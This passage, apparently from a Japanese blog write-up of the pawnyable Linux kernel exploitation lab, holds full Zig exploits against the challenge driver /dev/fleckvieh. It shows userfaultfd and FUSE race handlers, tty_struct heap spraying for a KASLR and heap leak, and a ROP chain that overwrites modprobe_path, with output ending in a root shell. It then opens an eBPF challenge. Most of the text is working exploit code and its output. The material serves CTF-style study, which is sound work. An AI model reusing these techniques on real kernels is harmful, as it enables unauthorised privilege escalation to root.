           const uffdio_copy = extern struct {
               pub const MODE = packed struct (u64) {
                   DONTWAKE: bool = false,
                   WP: bool = false,
                   _: u62 = 0,
               };
       
               dst: u64,
               src: u64,
               len: u64,
               mode: MODE,
               copy: i64,
           };
           const uffdio_zeropage = extern struct {
               pub const MODE = packed struct (u64) {
                   DONTWAKE: bool = false,
                   _: u63 = 0,
               };
       
               range: uffdio_range,
               mode: MODE,
               zeropage: i64,
           };
           const uffdio_writeprotect = extern struct {
               pub const MODE = packed struct (u64) {
                   WP: bool = false,
                   DONTWAKE: bool = false,
                   _: u62 = 0,
               };
       
               range: uffdio_range,
               mode: MODE,
           };
           const uffdio_continue = extern struct {
               pub const MODE = packed struct (u64) {
                   DONTWAKE: bool = false,
                   _: u63 = 0,
               };
       
               range: uffdio_range,
               mode: MODE,
               mapped: i64,
           };
       
           const UFFD_API: u64 = 0xaa;
           const UFFDIO = enum(u32) {
               const _uffdio = 0xaa;
               const ioctl = linux.IOCTL;
       
               API = ioctl.IOWR(_uffdio, 0x3f, uffdio_api),
               REGISTER = ioctl.IOWR(_uffdio, 0x00, uffdio_register),
               UNREGISTER = ioctl.IOR(_uffdio, 0x01, uffdio_range),
               WAKE = ioctl.IOR(_uffdio, 0x02, uffdio_range),
               COPY = ioctl.IOWR(_uffdio, 0x03, uffdio_copy),
               ZEROPAGE = ioctl.IOWR(_uffdio, 0x04, uffdio_zeropage),
               WRITEPROTECT = ioctl.IOWR(_uffdio, 0x06, uffdio_writeprotect),
               CONTINUE = ioctl.IOWR(_uffdio, 0x07, uffdio_continue),
           };
       
       
           pub fn register(region: []u8, comptime fault_handler: anytype, fh_args: anytype) !void {
               const fd: posix.fd_t = blk: {
                   const err = linux.syscall1(linux.syscalls.X64.userfaultfd, @as(u32, @bitCast(linux.O{ .CLOEXEC = true, .NONBLOCK = true })));
                   switch (linux.E.init(err)) {
                       .SUCCESS => break :blk @intCast(err),
                       else => |e| return posix.unexpectedErrno(e),
                   }
               };
       
               var ufapi = uffdio_api{ .api = UFFD_API, .features = .{}, .ioctls = undefined };
               switch (posix.errno(linux.ioctl(fd, @intFromEnum(UFFDIO.API), @intFromPtr(&ufapi)))) {
                   .SUCCESS => {},
                   else => |err| return posix.unexpectedErrno(err),
               }
       
               var ufreg = uffdio_register{ .range = .{ .start = @intFromPtr(@as([*]u8, @ptrCast(region))), .len = region.len }, .mode = .{ .MISSING = true }, .ioctls ...
               switch (posix.errno(linux.ioctl(fd, @intFromEnum(UFFDIO.REGISTER), @intFromPtr(&ufreg)))) {
                   .SUCCESS => {},
                   else => |err| return posix.unexpectedErrno(err),
               }
       
               var t = try std.Thread.spawn(.{}, fault_handler, .{fd} ++ fh_args);
               try pinThreadToCore(t.getHandle(), 0);
               t.detach();
           }
       };
       
       
       fn testFaultHandler(fd: posix.fd_t) void {
           const ufd = userfaultfd;
           const S = struct {
               var msg: ufd.msg = undefined;
               var fault_count: u32 = 0;
           };
       
           const page = posix.mmap(
               null,
               0x1000,
               linux.PROT.READ | linux.PROT.WRITE,
               posix.MAP{ .TYPE = .PRIVATE, .ANONYMOUS = true },
               -1,
               0,
           ) catch {
               std.log.err("mmap failed", .{});
               return;
           };
           defer posix.munmap(page);
       
           std.log.info("Waiting for page fault...", .{});
           var pollfds = [_]posix.pollfd{
               .{ .fd = fd, .events = posix.POLL.IN, .revents = undefined }
           };
           while (true) {
               _ = posix.poll(&pollfds, -1) catch break;
               const pollfd = pollfds[0];
       
               const err_mask = posix.POLL.ERR | posix.POLL.HUP;
               if (pollfd.revents & err_mask != 0) {
                   std.log.err("poll failed", .{});
                   return;
               }
       
               _ = posix.read(fd, std.mem.asBytes(&S.msg)) catch {
                   std.log.err("read failed", .{});
                   return;
               };
       
               const pagefault_event = switch (S.msg.event) {
                   .PAGEFAULT => S.msg.arg.pagefault,
                   else => {
                       std.log.err("Received non-pagefault event", .{});
                       return;
                   },
               };
       
               std.log.info("pagefault_event.flags = {any}", .{pagefault_event.flags});
               std.log.info("pagefault_event.addr = 0x{x}", .{pagefault_event.address});
       
               @memcpy(page[0..9], if (S.fault_count % 2 == 0) "Test (0)\x00" else "Test (1)\x00");
               S.fault_count += 1;
       
               var ufcopy = ufd.uffdio_copy{ .src = @intFromPtr(@as([*]u8, @ptrCast(page))), .dst = pagefault_event.address & ~@as(u64, 0xfff), .len = page.len, .mode = ...
               switch (posix.errno(linux.ioctl(fd, @intFromEnum(ufd.UFFDIO.COPY), @intFromPtr(&ufcopy)))) {
                   .SUCCESS => {},
                   else => |err| {
                       std.log.err("{any}", .{err});
                       return;
                   },
               }
           }
       }
       <<pawnyable-lib>>
       <<lk04-userfaultfd>>
       
       pub fn main() !void {
           {
               var cpu: linux.cpu_set_t = @splat(0);
               cpu[0] = 1;
       
               try linux.sched_setaffinity(linux.getpid(), &cpu);
           }
       
           const page = try posix.mmap(
               null,
               0x2000,
               linux.PROT.READ | linux.PROT.WRITE,
               posix.MAP{ .TYPE = .PRIVATE, .ANONYMOUS = true },
               -1,
               0,
           );
           try userfaultfd.register(page, testFaultHandler, .{});
       
           var buf: [0x100]u8 = undefined;
           for (0..2) |_| {
               const buf_as_cstring: [*:0]const u8 = @ptrCast(&buf);
               @memcpy(&buf, page[0..0x100]);
               std.debug.print("0x0000: {s}\n", .{buf_as_cstring});
               @memcpy(&buf, page[0x1000..][0..0x100]);
               std.debug.print("0x1000: {s}\n", .{buf_as_cstring});
           }
       }
       [INFO] Waiting for page fault...
       [INFO] pagefault_event.flags = tmp.DprYUckmLc.userfaultfd.msg__union_24586__struct_24587.FLAG{ .WRITE = false, .WP = false, .MINOR = false, ._ = 0 }
       [INFO] pagefault_event.addr = 0x7f9577e2b000
       0x0000: Test (0)
       [INFO] pagefault_event.flags = tmp.DprYUckmLc.userfaultfd.msg__union_24586__struct_24587.FLAG{ .WRITE = false, .WP = false, .MINOR = false, ._ = 0 }
       [INFO] pagefault_event.addr = 0x7f9577e2c000
       0x1000: Test (1)
       0x0000: Test (0)
       0x1000: Test (1)
       
       `copy_to_user`​/​`copy_from_user`[39
       m​はまず​`to`​/​`from`​の引
       数は参照を外すから、悪質なuserfaultfdのハンドラーは記憶をコーピする前に実行する。
       
       ROPchain
       grep /proc/kallsyms -e 'swapgs_restore_regs_and_return_to_usermode'
       ffffffff81800e10 T swapgs_restore_regs_and_return_to_usermode
       ropr --nosys --nojop -R '^(mov \[rax\], rdi|pop rax|pop rdi); ret;|^pop rsp; ret[^;]*?;' vmlinux
       0xffffffff8110850a: mov [rax], rdi; ret;
       0xffffffff811be9f4: pop rsp; ret 0x48b0;
       0xffffffff8126db98: pop rsp; ret 0xdc;
       0xffffffff813e525d: pop rsp; ret 0x7404;
       0xffffffff813e53bb: pop rsp; ret 0xf04;
       0xffffffff814a5527: pop rsp; ret 0x4d38;
       0xffffffff81c9cd9d: pop rsp; ret 0x4fff;
       0xffffffff81c9cda1: pop rsp; ret 0xefff;
       0xffffffff81ca6ca0: pop rax; ret;
       0xffffffff81ce088b: pop rdi; ret;
       0xffffffff81d8cf00: pop rsp; ret 1;
       0xffffffff81d962a4: pop rsp; ret;
       var PUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP: u64 = 0xffffffff8109b13a;
       
       var MOV_ADDROF_RAX_RDI: u64 = 0xffffffff8110850a;
       var POP_RAX: u64 = 0xffffffff8125a664;
       var POP_RDI: u64 = 0xffffffff812a7d7c;
       
       var KPTI_TRAMPOLINE: u64 = 0xffffffff81800e10+22;
       var MODPROBE_PATH: u64 = 0xffffffff81e37ea0;
       
       fn ropchain(buf: []u8) !usize {
           const chain = [_]u64{
               0, // junk
               POP_RDI,
               std.mem.readInt(u64, "/tmp/x\x00\x00", .little),
               POP_RAX,
               MODPROBE_PATH,
               MOV_ADDROF_RAX_RDI,
       
               KPTI_TRAMPOLINE,
               0, // junk
               0, // junk
               @intFromPtr(&modprobePath),
               user_cs,
               user_rflags,
               user_rsp,
               user_ss,
           };
           @memcpy(buf[0..chain.len*@sizeOf(u64)], std.mem.asBytes(&chain));
           return std.mem.asBytes(&chain).len;
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &PUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP,
       
               &MOV_ADDROF_RAX_RDI,
               &POP_RAX,
               &POP_RDI,
       
               &KPTI_TRAMPOLINE,
               &MODPROBE_PATH,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       <<pawnyable-lib>>
       <<lk04-types>>
       <<tty_struct>>
       <<lk04-userfaultfd>>
       <<lk04-ropchain>>
       
       const UAF = enum {
           AAR,
           AAW,
       };
       
       fn sprayFaultHandler(uffd: posix.fd_t, fd: posix.fd_t, ttys: []posix.fd_t, buf: []u8, id: *i32, uaf_type: *UAF) void {
           var pollfds = [_]posix.pollfd{
               .{ .fd = uffd, .events = posix.POLL.IN, .revents = undefined }
           };
       
           while (true) {
               _ = posix.poll(&pollfds, -1) catch break;
               const pollfd = pollfds[0];
       
               const err_mask = posix.POLL.ERR | posix.POLL.HUP;
               if (pollfd.revents & err_mask != 0) {
                   std.log.err("poll failed", .{});
                   return;
               }
       
               var msg: userfaultfd.msg = undefined;
               _ = posix.read(uffd, std.mem.asBytes(&msg)) catch {
                   std.log.err("read failed", .{});
                   return;
               };
       
               const pagefault_event = switch (msg.event) {
                   .PAGEFAULT => msg.arg.pagefault,
                   else => {
                       std.log.err("received non-pagefault event", .{});
                       return;
                   },
               };
       
       
               std.log.info("Beginning {s}", .{@tagName(uaf_type.*)});
               switch (uaf_type.*) {
                   .AAR => {},
                   .AAW => {
                       // we want to overwrite the data at the address `heap_leak' with malicious tty_operations structures
                       // but we cannot simply SET the contents of the tty_struct that `heap_leak' points to
                       // instead, we will free the aforementioned tty_struct(s) and spray tty_operations (by adding blobs with contents of `buf'), hoping that one will be placed at `heap_leak'
                       for (0..100) |_| {
                           _ = fleckvieh.ioctl(fd, .ADD, buf, null) catch |err| {
                               std.log.err("blob_add failed with {any}", .{err});
                               return;
                           };
                       }
                   },
               }
               _ = fleckvieh.ioctl(fd, .DEL, null, id.*) catch |err| {
                   std.log.err("blob_del failed with {any}", .{err});
                   return;
               };
       
               for (ttys) |*tty| {
                   tty.* = posix.open("/dev/ptmx", .{ .ACCMODE = .RDONLY, .NOCTTY = true }, 0o660) catch unreachable;
               }
       
               var ufcopy = userfaultfd.uffdio_copy{ .src = @intFromPtr(@as([*]u8, @ptrCast(buf))), .dst = pagefault_event.address, .len = std.heap.page_size_min, .mode = .{}, .copy = ...
               switch (posix.errno(linux.ioctl(uffd, @intFromEnum(userfaultfd.UFFDIO.COPY), @intFromPtr(&ufcopy)))) {
                   .SUCCESS => {},
                   else => |err| {
                       std.log.err("{any}", .{err});
                       return;
                   },
               }
           }
       }
       
       fn exploit(fd: posix.fd_t) !void {
           var ttys: [10]posix.fd_t = undefined;
           var buf: [1024]u8 = undefined;
           var id: i32 = undefined;
           var uaf_type: UAF = undefined;
       
       
           const faultable_pages = try posix.mmap(
               null,
               3*std.heap.page_size_min, // 3 UAFs
               linux.PROT.READ | linux.PROT.WRITE,
               posix.MAP{ .TYPE = .PRIVATE, .ANONYMOUS = true },
               -1,
               0,
           );
           defer posix.munmap(faultable_pages);
           try userfaultfd.register(faultable_pages, sprayFaultHandler, .{fd, &ttys, &buf, &id, &uaf_type});
       
       
           const kaslr_offset = blk: {
               defer for (ttys) |tty| posix.close(tty);
               id = try fleckvieh.ioctl(fd, .ADD, &buf, null);
               uaf_type = .AAR;
               // trigger a page fault and leak heap address
               // when calling copy_to_user, the first few bytes are copied from the heap, and only when they are moved into `faultable_pages'
               // does the UAF occur. Therefore, to ensure the bytes containing `tty_struct.ops' are not copied before copy_to_user accesses `faultable_pages', we must make a smaller request.
               _ = try fleckvieh.ioctl(fd, .GET, faultable_pages[0..0x20], id);
       
               const ptmx_fops_addr: u64 = 0xffffffff81c3c3c0;
               break :blk std.mem.bytesAsValue(u64, faultable_pages[@offsetOf(tty_struct, "ops")..][0..@sizeOf(@FieldType(tty_struct, "ops"))]).* - ptmx_fops_addr;
           };
           adjust_offsets(kaslr_offset);
           std.log.info("Kernel base @ 0x{x}", .{0xffffffff81000000+kaslr_offset});
       
       
           const heap_leak = blk: {
               defer for (ttys) |tty| posix.close(tty);
               id = try fleckvieh.ioctl(fd, .ADD, &buf, null);
               uaf_type = .AAR;
               _ = try fleckvieh.ioctl(fd, .GET, faultable_pages[std.heap.page_size_min..][0..1024], id);
       
               const offset = @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(@FieldType(tty_struct, "ldisc_sem"), "read_wait");
               break :blk std.mem.bytesAsValue(u64, faultable_pages[std.heap.page_size_min..][offset..][0..8]).* - offset;
           };
           std.log.info("Heap leak = 0x{x}", .{heap_leak});
       
           {
               @memcpy(buf[0..1024], faultable_pages[std.heap.page_size_min..][0..1024]);
               const tty = std.mem.bytesAsValue(tty_struct, &buf);
               tty.*.magic = 0x5401;
               tty.*.kref = 0;
               tty.*.dev = 0;
               tty.*.driver = heap_leak;
               tty.*.ops = heap_leak+0x100;
       
               // ensure ropchain is far away enough from important tty_struct internals
               @memcpy(buf[0x100..][0..@sizeOf(tty_operations)], std.mem.asBytes(&tty_operations{ .ioctl = PUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP }));
               _ = try ropchain(buf[0x100..][@sizeOf(tty_operations)..]);
       
               id = try fleckvieh.ioctl(fd, .ADD, &buf, null);
               uaf_type = .AAW;
               _ = try fleckvieh.ioctl(fd, .SET, faultable_pages[2*std.heap.page_size_min..][0..1024], id);
           }
       
           for (ttys) |tty| _ = linux.ioctl(tty, 0xdeadbeef, heap_leak+0x100+@sizeOf(tty_operations));
       }
       
       pub fn main() !void {
           {
               var cpu: linux.cpu_set_t = @splat(0);
               cpu[0] = 1;
               try linux.sched_setaffinity(linux.getpid(), &cpu);
           }
           catchSigsegv(&modprobePath);
           saveState();
       
           const fd = try posix.open("/dev/fleckvieh", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           try exploit(fd);
       }
       user
       [INFO] Beginning AAR
       [INFO] Kernel base @ 0xffffffffb0800000
       [INFO] Beginning AAR
       [INFO] Heap leak = 0xffff9635433f4400
       [INFO] Beginning AAW
       [INFO] You won!!
       root
       
 (DIR) 完全なエクスプロイト
       
       いいね。
       
       === FUSE
       
       
       FUSEはユーザー空間でファイルシステムを実装するものだ。
       ま、僕たちの目的において重要なのはとあるファイルを開けるときに任意ハンドラーは実行する。
       
       userfaultfdのようにまずは単純なプログラムを実装しよう。
       const std = @import("std");
       
       pub fn build(b: *std.Build) void {
           const target = b.resolveTargetQuery(.{
               .cpu_arch = .x86_64,
               .os_tag = .linux,
               .abi = .musl,
           });
           const optimize = b.standardOptimizeOption(.{});
       
           const exe = b.addExecutable(.{
               .name = "exploit",
               .root_source_file = b.path("main.zig"),
               .target = target,
               .optimize = optimize,
               .link_libc = true,
               .linkage = .static,
           });
       
           exe.linkSystemLibrary2("fuse", .{ .use_pkg_config = .yes, .preferred_link_mode = .static });
           exe.linkSystemLibrary("pthread");
           exe.linkSystemLibrary("dl");
           b.installArtifact(exe);
       }
       
       (FUSEのZigバインディングはこち [6])
       <<pawnyable-lib>>
       
       const fuse = @import("fuse29.zig");
       
       const content = "Hello world!\n";
       
       export fn getattrCallback(path: [*:0]const u8, stbuf: ?*linux.Stat) callconv(.C) i32 {
           std.log.info("getattrCallback", .{});
       
           if (std.mem.eql(u8, path[0..5], "/file")) {
               if (stbuf) |st| {
                   st.* = std.mem.zeroInit(linux.Stat, .{
                       .mode = linux.S.IFREG | 0o777,
                       .nlink = 1,
                       .size = content.len,
                   });
               }
               return 0;
           }
           return -@as(i32, @intCast(@intFromEnum(posix.E.NOENT)));
       }
       
       export fn openCallback(_: [*:0]const u8, _: ?*fuse.fuse_file_info) callconv(.C) i32 {
           std.log.info("openCallback", .{});
           return 0;
       }
       
       export fn readCallback(path: [*:0]const u8, buf: [*]u8, size: usize, offset: i64, _: ?*fuse.fuse_file_info) callconv(.C) i32 {
           std.log.info("readCallback", .{});
       
           if (std.mem.eql(u8, path[0..5], "/file")) {
               if (offset >= content.len) return 0;
       
               const length = @min(content.len - @as(usize, @intCast(offset)), size);
               @memcpy(buf[0..length], content[@as(usize, @intCast(offset))..][0..length]);
               return @intCast(length);
           }
           return -@as(i32, @intCast(@intFromEnum(posix.E.NOENT)));
       }
       
       const fops = blk: {
           var tmp = std.mem.zeroes(fuse.fuse_operations);
           tmp.getattr = getattrCallback;
           tmp.open = openCallback;
           tmp.read = readCallback;
           break :blk tmp;
       };
       
       pub fn main() !void {
           try posix.mkdir("/tmp/test", 0o777);
           var fargs = fuse.fuse_args{};
       
           const chan = fuse.fuse_mount("/tmp/test", &fargs) orelse return error.FuseMountError;
           defer fuse.fuse_unmount("/tmp/test", chan);
       
           const f = fuse.fuse_new(chan, &fargs, &fops, @sizeOf(@TypeOf(fops)), null) orelse return error.FuseNewError;
       
           _ = fuse.fuse_set_signal_handlers(fuse.fuse_get_session(f));
           _ = fuse.fuse_loop_mt(f);
       }
       [INFO] getattrCallback
       [INFO] openCallback
       [INFO] readCallback
       Hello world!
       
       さて、(悪)用しよう:
       <<pawnyable-lib>>
       <<pin-to-core>>
       <<tty_struct>>
       <<lk04-types>>
       <<lk04-ropchain>>
       
       const fuse = @import("fuse29.zig");
       
       fn getattrCallback(path: [*:0]const u8, stbuf: ?*linux.Stat) callconv(.C) i32 {
           if (std.mem.eql(u8, path[0..4], "/aar") or std.mem.eql(u8, path[0..4], "/aaw") ) {
               if (stbuf) |st| {
                   st.* = std.mem.zeroInit(linux.Stat, .{
                       .mode = linux.S.IFREG | 0o777,
                       .nlink = 1,
                       .size = std.heap.page_size_min,
                   });
               }
               return 0;
           }
           return -@as(i32, @intCast(@intFromEnum(posix.E.NOENT)));
       }
       
       fn openCallback(_: [*:0]const u8, _: ?*fuse.fuse_file_info) callconv(.C) i32 {
           return 0;
       }
       
       var fleck_fd: posix.fd_t = undefined;
       var ttys: [10]posix.fd_t = undefined;
       var victim_id: i32 = undefined;
       var blob_buf: [1024]u8 = undefined;
       
       fn readCallback(path: [*:0]const u8, buf: [*]u8, size: usize, _: i64, _: ?*fuse.fuse_file_info) callconv(.C) i32 {
           const ENOENT = -@as(i32, @intCast(@intFromEnum(posix.E.NOENT)));
           if (std.mem.eql(u8, path[0..4], "/aar")) {
               std.log.debug("Beginning AAR", .{});
           } else if (std.mem.eql(u8, path[0..4], "/aaw")) {
               std.log.debug("Beginning AAW", .{});
       
               for (0..100) |_| {
                   _ = fleckvieh.ioctl(fleck_fd, .ADD, &blob_buf, null) catch |err| {
                       std.log.err("blob_add failed with {any}", .{err});
                       return ENOENT;
                   };
               }
           } else {
               std.log.err("Unknown path {s}", .{path});
               return ENOENT;
           }
       
           _ = fleckvieh.ioctl(fleck_fd, .DEL, null, victim_id) catch |err| {
               std.log.err("blob_del failed with {any}", .{err});
               return ENOENT;
           };
       
           for (&ttys) |*tty| {
               tty.* = posix.open("/dev/ptmx", .{ .ACCMODE = .RDONLY, .NOCTTY = true }, 0o660) catch unreachable;
           }
       
           @memcpy(buf[0..1024], blob_buf[0..1024]);
           return @intCast(size);
       }
       
       const fops = blk: {
           var tmp = std.mem.zeroes(fuse.fuse_operations);
           tmp.getattr = getattrCallback;
           tmp.open = openCallback;
           tmp.read = readCallback;
           break :blk tmp;
       };
       
       fn fuseThread(fuse_ready: *std.Thread.ResetEvent) void {
           posix.mkdir("/tmp/pwn", 0o777) catch {
               std.log.err("Could not create /tmp/pwn", .{});
               return;
           };
           var fargs = fuse.fuse_args{};
       
           const chan = fuse.fuse_mount("/tmp/pwn", &fargs) orelse {
               std.log.err("fuse_mount failed", .{});
               return;
           };
           defer fuse.fuse_unmount("/tmp/pwn", chan);
       
           const f = fuse.fuse_new(chan, &fargs, &fops, @sizeOf(@TypeOf(fops)), null) orelse {
               std.log.err("fuse_new failed", .{});
               return;
           };
       
           _ = fuse.fuse_set_signal_handlers(fuse.fuse_get_session(f));
           fuse_ready.set();
           _ = fuse.fuse_loop_mt(f);
       }
       
       fn fusePage(comptime path: []const u8) ![]align(std.heap.page_size_min) u8 {
           const S = struct {
               var fd: ?posix.fd_t = null;
           };
           if (S.fd) |fd| posix.close(fd);
       
           S.fd = try posix.open(path, .{ .ACCMODE = .RDWR }, 0o660);
           return try posix.mmap(
               null,
               std.heap.page_size_min,
               linux.PROT.READ | linux.PROT.WRITE,
               posix.MAP{ .TYPE = .PRIVATE },
               S.fd.?,
               0,
           );
       }
       
       fn exploit() !void {
           const kaslr_offset = blk: {
               const aar_page = try fusePage("/tmp/pwn/aar");
               defer posix.munmap(aar_page);
               defer for (&ttys) |tty| posix.close(tty);
               victim_id = try fleckvieh.ioctl(fleck_fd, .ADD, &blob_buf, null);
               _ = try fleckvieh.ioctl(fleck_fd, .GET, aar_page[0..0x20], victim_id);
       
               const ptmx_fops_addr: u64 = 0xffffffff81c3c3c0;
               break :blk std.mem.bytesAsValue(u64, aar_page[@offsetOf(tty_struct, "ops")..][0..@sizeOf(@FieldType(tty_struct, "ops"))]).* - ptmx_fops_addr;
           };
           adjust_offsets(kaslr_offset);
           std.log.info("Kernel base @ 0x{x}", .{0xffffffff81000000+kaslr_offset});
       
       
           const aar_page = try fusePage("/tmp/pwn/aar");
           defer posix.munmap(aar_page);
           const heap_leak = blk: {
               defer for (&ttys) |tty| posix.close(tty);
               victim_id = try fleckvieh.ioctl(fleck_fd, .ADD, &blob_buf, null);
               _ = try fleckvieh.ioctl(fleck_fd, .GET, aar_page[0..1024], victim_id);
       
               const offset = @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(@FieldType(tty_struct, "ldisc_sem"), "read_wait");
               break :blk std.mem.bytesAsValue(u64, aar_page[offset..][0..8]).* - offset;
           };
           std.log.info("Heap leak = 0x{x}", .{heap_leak});
       
           {
               @memcpy(blob_buf[0..1024], aar_page[0..1024]);
               const aaw_page = try fusePage("/tmp/pwn/aaw");
               defer posix.munmap(aaw_page);
       
               const tty = std.mem.bytesAsValue(tty_struct, &blob_buf);
               tty.*.magic = 0x5401;
               tty.*.kref = 0;
               tty.*.dev = 0;
               tty.*.driver = heap_leak;
               tty.*.ops = heap_leak+0x100;
       
               // ensure ropchain is far away enough from important tty_struct internals
               @memcpy(blob_buf[0x100..][0..@sizeOf(tty_operations)], std.mem.asBytes(&tty_operations{ .ioctl = PUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP }));
               _ = try ropchain(blob_buf[0x100..][@sizeOf(tty_operations)..]);
       
               victim_id = try fleckvieh.ioctl(fleck_fd, .ADD, &blob_buf, null);
               _ = try fleckvieh.ioctl(fleck_fd, .SET, aaw_page[0..1024], victim_id);
           }
       
           for (&ttys) |tty| _ = linux.ioctl(tty, 0xdeadbeef, heap_leak+0x100+@sizeOf(tty_operations));
       }
       
       
       pub fn main() !void {
           {
               var cpu: linux.cpu_set_t = @splat(0);
               cpu[0] = 1;
               try linux.sched_setaffinity(linux.getpid(), &cpu);
           }
           catchSigsegv(&modprobePath);
           saveState();
       
           var fuse_ready = std.Thread.ResetEvent{};
           var t = try std.Thread.spawn(.{}, fuseThread, .{&fuse_ready});
           try pinThreadToCore(t.getHandle(), 0);
           t.detach();
           fuse_ready.wait();
       
           fleck_fd = try posix.open("/dev/fleckvieh", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fleck_fd);
       
           try exploit();
           std.log.debug("Wat", .{});
       
       }
       
       const DEBUG = true;
       user
       [DBUG] Beginning AAR
       [INFO] Kernel base @ 0xffffffff81200000
       [DBUG] Beginning AAR
       [INFO] Heap leak = 0xffffa244c3c08c00
       [DBUG] Beginning AAW
       [INFO] You won!!
       root
       
 (DIR) 完全なエクスプロイト
       
       楽勝。
       
       == Brahman
       
       
       課題情報
       sed -i -E "s|^(echo 2 > /proc/sys/kernel/kptr_restrict)|# \1|" rootfs/etc/init.d/S99pawnyable
       sed -i -E "s|^(echo 1 > /proc/sys/kernel/dmesg_restrict)|# \1|" rootfs/etc/init.d/S99pawnyable
       sed -i -E "s/(setuidgid) 1337 (sh)/\1 0 \2/" rootfs/etc/init.d/S99pawnyable
       
       sed -i '/${DEBUG:+ -s} \\/d' run.sh
       sed -i -E '/qemu-system-x86_64 \\/a \ \ \ \ ${DEBUG:+ -s} \\' run.sh
       sed -i -E 's/ kaslr/ ${NOKASLR:+no}kaslr/' run.sh
       sed -i '/-serial unix:vm.sock,server,nowait/d' run.sh
       sed -i -E '/-monitor \/dev\/null/a \ \ \ \ -serial unix:vm.sock,server,nowait \\' run.sh
       SMEP enabled
       SMAP enabled
       KPTI enabled
       KASLR enabled
       
       これは僕のeBPFの初経験から、最初にちょっと勉強した [7]。
       <<pawnyable-lib>>
       
       const BPF = linux.BPF;
       const AF = linux.AF;
       const SOCK = linux.SOCK;
       const SOL = linux.SOL;
       const SO = linux.SO;
       
       
       const SK = enum(i32) {
           DROP = 0,
           PASS,
       };
       
       // broken in 0.14.1
       fn _ld_dw1(dst: BPF.Insn.Reg, imm: u64) BPF.Insn {
           return .{
               .code = BPF.LD | BPF.DW | BPF.IMM,
               .dst = @intFromEnum(dst),
               .src = @intFromEnum(BPF.Insn.Reg.r0),
               .off = 0,
               .imm = @as(i32, @bitCast(@as(u32, @truncate(imm)))),
           };
       }
       fn _ld_dw2(imm: u64) BPF.Insn {
           return .{
               .code = 0,
               .dst = 0,
               .src = 0,
               .off = 0,
               .imm = @as(i32, @bitCast(@as(u32, @truncate(imm >> 32)))),
           };
       }
       
       fn bpf_string_map(str: [:0]const u8) !posix.fd_t {
           var attr = BPF.Attr{
               .map_create = std.mem.zeroes(BPF.MapCreateAttr),
           };
       
           attr.map_create.map_type = @intFromEnum(BPF.MapType.array);
           attr.map_create.key_size = @sizeOf(i32);
           attr.map_create.value_size = @sizeOf(u64);
           attr.map_create.max_entries = 1;
           attr.map_create.map_flags = BPF.BPF_F_RDONLY_PROG;
       
           const rc = linux.bpf(.map_create, &attr, @sizeOf(BPF.MapCreateAttr));
           const fd: posix.fd_t = switch (posix.errno(rc)) {
               .SUCCESS => @intCast(rc),
               .INVAL => return error.MapTypeOrAttrInvalid,
               .NOMEM => return error.SystemResources,
               .PERM => return error.AccessDenied,
               else => |err| return posix.unexpectedErrno(err),
           };
       
           try BPF.map_update_elem(fd, &std.mem.toBytes(@as(i32, 0)), str, BPF.ANY);
       
           attr = BPF.Attr{
               .map_elem = std.mem.zeroes(BPF.MapElemAttr),
           };
           attr.map_elem.map_fd = fd;
           try switch (posix.errno(linux.bpf(.map_freeze, &attr, @sizeOf(BPF.MapElemAttr)))) {
               .SUCCESS => {},
               else => |err| posix.unexpectedErrno(err),
           };
       
           return fd;
       }
       
       
       fn example1() !void {
           std.debug.print("---(BPF Example 1)---\n", .{});
       
           const insns = [_]BPF.Insn{
               .mov(.r0, 4),
               .exit(),
           };
       
           var verifier_log: [0x10000]u8 = undefined;
           var log = BPF.Log{ .buf = &verifier_log, .level = 2 };
           defer std.log.info("BPF Verifier output:\n{s}", .{std.mem.sliceTo(&verifier_log, 0)});
       
           const progfd = try BPF.prog_load(BPF.ProgType.socket_filter, &insns, &log, "GPL v3"<<footnote("8")>>, 0, 0);
       
           var socks: [2]linux.fd_t = undefined;
           switch (posix.errno(linux.socketpair(AF.UNIX, SOCK.DGRAM, 0, &socks))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
           switch (posix.errno(linux.setsockopt(socks[0], SOL.SOCKET, SO.ATTACH_BPF, std.mem.asBytes(&progfd), 4))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
       
           const input = "Hello";
           _ = try posix.write(socks[1], input);
       
           var buf: [10]u8 = undefined;
           const n_read = try posix.read(socks[0], &buf);
       
           std.log.info("Sent '{s}', received '{s}'", .{ input, buf[0..n_read] });
       }
       
       fn example2() !void {
           std.debug.print("---(BPF Example 2)---\n", .{});
       
           const mapfd: i32 = try BPF.map_create(.array, @sizeOf(i32), @sizeOf(u64), 32);
       
           try BPF.map_update_elem(mapfd, &.{1}, &.{ 0xca, 0xfe, 0xba, 0xbe, 0xca, 0xfe, 0xba, 0xbe }, BPF.ANY);
       
           const insns = [_]BPF.Insn{
               .st(.double_word, .r10, -0x8, 1),
               .st(.double_word, .r10, -0x10, 0x1337),
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
       
               .mov(.r2, .r10),
               .add(.r2, -0x8),
               .mov(.r3, .r2),
               .add(.r3, -0x8),
               .mov(.r4, 0),
               .call(.map_update_elem),
       
               .mov(.r0, 0),
               .exit(),
           };
       
           var verifier_log: [0x10000]u8 = undefined;
           var log = BPF.Log{ .buf = &verifier_log, .level = 2 };
           defer std.log.info("BPF Verifier output:\n{s}", .{std.mem.sliceTo(&verifier_log, 0)});
       
           const progfd = try BPF.prog_load(BPF.ProgType.socket_filter, &insns, &log, "GPL v3", 0, 0);
       
           var socks: [2]linux.fd_t = undefined;
           switch (posix.errno(linux.socketpair(AF.UNIX, SOCK.DGRAM, 0, &socks))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
           switch (posix.errno(linux.setsockopt(socks[0], SOL.SOCKET, SO.ATTACH_BPF, std.mem.asBytes(&progfd), 4))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
       
           var buf: [1]u64 = undefined;
           try BPF.map_lookup_elem(mapfd, &.{1}, std.mem.asBytes(&buf));
           std.log.info("BPF_map[1] = 0x{x}", .{buf[0]});
       
